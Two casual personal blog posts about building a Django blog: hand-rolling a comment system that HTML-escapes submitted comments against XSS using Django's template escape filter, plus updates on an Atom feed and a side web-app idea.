the elusive commenting system

BDT (yeah, third post in, already acronym-ising this thing) finally has one of them there commenting systems. Check it out below if you don’t believe me.

The delay

The reason I was holding back was because I wanted to “hand-roll” my system for maximum control. Yeah, this is a gross violation of “don’t reinvent the wheel” (Django has a comments module), but sometimes invention is fun even if you’re contributing nothing new to anything. My main motivation for spitting in the face of Django was because at some stage I want to play with Akismet. There are tutorials out there for adding Akismet using the existing comments system, however they all involve altering core Django code and I sorta felt that this could be a bit messy – particularly in terms of maintenance further down the line.

The problem

The Django API makes it a breeze to add a comment, the big problem comes in escaping stray html / javascript etc. I could write my own sanitiser – it probably wouldn’t be all that hard, but I would never want to reinvent the wheel (I’m banking on 90% of readers skimming the last paragraph). The only method out there in Django seems to be that in the template system – and that’s only going to be directly useful in sanitising the main blog page, and only then if I explicitly tell it to on every template. It won’t stop somebody from submitting some code and it messing about with my admin page, for example. But the method itself is useful, it is powerful and in one command it can strip a string of any potential offensiveness (by offensiveness I mean XSS etc, not the word, “dick” – we wouldn’t want to prevent people from commenting about their favourite British pudding now, would we?).

The solution

PS I have stumbled upon this idea in surfing, but cannot remember where, if you were the originator, tell me and I’ll give due credit.

To harness the escape method, first you need to hook into the django.template module – specifically looking for the Parser class (I was stumbling about aimlessly in the python shell when I finally cracked this one, there is probably a better way of doing this). From an instance of the Parser class you execute the find_filter method to return the escape function, which you can then use at will. So, sticking this in your “add a comment” view-method-thing would look a little like this:

from django.template import Parser

...ace django code goes here...

p = Parser("you could probably put anything in here, I should probably try looking for a static class or something more efficient")
esc = p.find_filter("escape")
new_comment.content = esc(new_comment.content)

...more ace django code...

note to self: find / implement a “code” template module. Preferably with syntax highlighting built in.

obviously, you’ll want to do some content checks and the like, but you get the general idea. I am of the opinion that if you are not super paranoid about what you let into an effectively open database then you are asking for trouble. If you need further proof (beyond common sense), look at all of the trouble myspace have had over the years.

Still to come…

hmmmm, somehow this has formed itself into BDT’s first “proper” entry, I should probably have planned it better. Anyway, next on my list are per-category feeds, a bit of an “about” section and then some playing with Django vs Jabber interactivity. Should be fun, yay!

keeping this thing updated

…is a royal pain in the bollock. Figure I should give a small checklist of what Si has been working on:

XML Feed

I have just finished implementing an Atom feed for this mofo. It was ridiculously simple using Django – create a feed class, point the url file at it and you’re away. I think I will have to stick some per-category feeds in because that was waaaay too easy

Comments System

I am working on getting a comments system sorted ASAP, I think the power of blogging is in the dialogue – without it you have a glorified ego-wank. The aforementioned feed will not be going live until this is all cleared and working.

Super hyper mega WEB APP!!!

Hayley and me – we had one of them $5 ideas* that she swears is gonna make her us a million. I am not so sure. I just want to be able to say that I have successfully deployed a working web application, rather than being a dumb simpleton who has no idea of the rigeurs involved. The app itself is pretty useless to anyone not of the myspace generation and it took me just 45 minutes to manufacture a proof of concept (again – thanks to my boyfriend, Django) – but there is always a chance that Fox will give me £50 for it within the next 10 months, therefore making me a profit on my hosting. Wooyay.

* ok, it’s probably closer to 50p.

So yeah – still plenty on my plate, next post will hopefully about this mysterious wAPP (saying it aloud like that is strangely satisfying), if not inviting you – my non-readers – to leave a comment.